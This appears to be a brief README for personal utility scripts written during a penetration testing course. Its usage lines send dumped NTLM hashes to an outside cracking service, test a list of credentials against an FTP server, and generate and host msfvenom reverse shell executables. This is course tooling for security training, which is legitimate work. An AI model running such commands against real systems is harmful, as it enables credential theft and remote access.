Util scripts I wrote while taking the Offensive Security: Pentesting with Kali course
Submit NTLM hashes to http://cracker.offensive-security.com and retrieve results
> python3 ./cracker.py 0000 - < hashdump.txt
Validate credentials against an ftp server
> python3 ./ftp_check.py ftp.domain.local --stdin < ftp_creds.txt
Generate and (optionally) host reverse shell executables from msfvenom
> python3 ./payload_gen tap0 -l 80